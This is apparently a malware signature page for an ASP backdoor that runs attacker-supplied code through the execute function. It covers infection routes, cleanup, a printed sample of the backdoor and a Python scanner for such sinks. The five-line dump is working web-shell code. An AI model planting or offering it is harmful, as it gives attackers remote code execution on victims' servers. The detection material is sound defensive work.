Malware Signatures


asp.backdoor.execute.001

This malware category covers server-side malicious scripts that are commonly used as backdoors. Typical examples are file managers, web shells, tools for bypassing the admin login, and single-purpose scripts that let the attacker upload and run other malicious scripts. The payload is ASP based, so it is intended for server-side use and runs directly on the server while the page is loaded. Only the result of the payload (such as a web shell interface) is visible in the browser, not the malicious code itself. It is very common for backdoors to leave no visible trace in the site's output, so they cannot be detected by visiting the infected site from outside. Server-level analysis is necessary in case of infection by this type of malware.
This backdoor type uses the ASP execute function to run the malicious payload, which can be any ASP code provided in the URL and passed as a request variable (GET request).

Affecting

Any ASP based website, typically infected through vulnerable code or compromised FTP credentials.

Cleanup

Cleanup is done by deleting the malicious file or, if the code was injected into a valid file, removing the injected code from that file. This malware can be found on your system by searching for the ASP execute command and evaluating the surrounding logic (valid programs can use this command, so be careful).

Dump

<% If Request("xrh")<>"" Then
   E=request("xrh")
   execute E
   end if
%>
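To support the search described under Cleanup, the following is an added example (not part of the original signature page) of a small scanner that flags execute/eval sinks in ASP files and rates a hit as high only when the argument is visibly taken from Request, as in the dump above; the samples and the file extensions it scans are constructed assumptions.

```python
import os
import re

# Constructed sample: the backdoor from the dump above, and a benign use of Execute.
SAMPLE_BACKDOOR = '''<% If Request("xrh")<>"" Then
   E=request("xrh")
   execute E
   end if
%>'''

SAMPLE_BENIGN = '''<%
   Dim code
   code = "Response.Write(""hello"")"
   Execute code
%>'''

# Dynamic-code sinks in classic ASP/VBScript, followed by their first argument token.
SINK_RE = re.compile(r'\b(execute|executeglobal|eval)\b\s*\(?\s*([A-Za-z_][A-Za-z0-9_]*)', re.I)
# A variable assigned straight from the Request collections (the "E=request(...)" line).
SOURCE_RE = re.compile(r'\b([A-Za-z_][A-Za-z0-9_]*)\s*=\s*request(\.(querystring|form|cookies))?\s*\(', re.I)

def scan_asp_source(src):
    """Return (line_no, severity, detail) tuples for one ASP source text.
    'high': a sink runs request-derived data (the pattern in the dump);
    'review': a sink is used but its input is not visibly request-derived,
    and since valid programs can use Execute a person must evaluate the logic.
    Line-based heuristic: does not follow data through helper functions or files."""
    tainted = {}      # lower-cased variable name -> line where it was read from Request
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = SOURCE_RE.search(line)
        if m:
            tainted[m.group(1).lower()] = no
        for s in SINK_RE.finditer(line):
            sink, arg = s.group(1), s.group(2)
            if arg.lower() == "request" or arg.lower() in tainted:
                findings.append((no, "high", f"{sink} runs request-derived data ({arg})"))
            else:
                findings.append((no, "review", f"{sink} called with {arg}"))
    return findings

def scan_tree(root, exts=(".asp", ".asa", ".inc")):
    """Walk a web root and yield (path, finding) for every ASP-like file (assumed extensions)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in scan_asp_source(fh.read()):
                        yield path, finding
```

Run scan_tree against the web root and inspect every "high" hit first; "review" hits are the legitimate uses of execute the text warns about and need a manual look.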